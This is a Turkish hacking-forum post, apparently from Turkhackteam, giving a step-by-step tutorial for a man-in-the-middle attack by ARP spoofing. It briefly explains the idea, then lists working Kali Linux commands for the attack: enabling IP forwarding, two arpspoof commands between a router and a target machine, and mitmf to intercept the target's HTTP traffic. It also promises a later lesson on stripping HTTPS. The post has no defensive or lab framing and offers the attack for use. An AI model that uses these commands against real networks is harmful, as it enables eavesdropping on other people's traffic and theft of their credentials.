Man in the middle attack (MITM), Ortadaki Adam, Dış Ağ Saldırısı

nessina

Yeni üye
17 Mar 2009
29
0
Mitm saldırısı yani bizim dilimizde ortadaki adam saldırısı demek özet olarak; amac burda araya girerek saldırı yapılacak hedefin ile ana modemin arasına giriyor. Modem ile bilgisayar arasındaki bilgi alışverişi bir mac adresinden diğer mac adresine göre yapılmaktadır. işte tam bu noktada mitm saldırısı modeme diyecek ki ben hedef cihazım bilgileri bana gönder aynı zamanda hedef bilgisayara da ben modemim sen bilgileri bana gönder. İşte bu noktada hem hedef cihaz hem de modem yanılacak ; gelen ve giden tüm trafik üzerimizinden geçicek.
şimdi başlayalım……….

Dış ağ saldırısı için kali linux makinamız sol üste devices-network-network setting diyip Bridged adaptör konumuna getirecez tabi bunun için wireless kart adaptör olması lazım

kali linux terminali açıyoruz

ifconfig : hem linux hemde hedef bilgisayarı tanımlayalım

arp -a : (adres çözümleme protokulu) hangi ip numarası hangi mac numarasına sahiptir gösterir bize. hem kali linux hemde hedef bilgisayarın arp -a tanımlayalım

echo 1 > /proc/sys/net/ipv4/ip_forward (ilk önce bu komutu tanıtacağız olmasa olmaz )

3 tane tane terminal açıyoruz

arpspoof -i eth0 -t modem İP hedef İP ilk terminale

arpspoof -i eth0 -t hedef İP modem İP 2. terminale

bu ikisini yaptığımızda zaten hedef bilgisayarı zehirlemişizdir hedef bilgisayarada terminalde arp -a dedeğimiz zaman görücez ki bizim sanal makinanın mac adresini almıştır

mitmf --arp --spoof --gateway modem İP --target hedef İP -i eth0 3.terminale

tıkladığımızda not command diyorsa sizde tanımlı değildir ındırıyoruz

apt-get install mitmf

daha sonra gelen giden trafiği görmüş olacağız tabi bu http li siteler için htpps li sitelerden gelen bilgilere ulaşamazcaz daha sonraki videolarımızda htpps li videoları nasıl htpp liye cevireceğimizi anlatacağım…..

alta videosu vardır...


https://youtu.be/bOi0mraTkNU
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.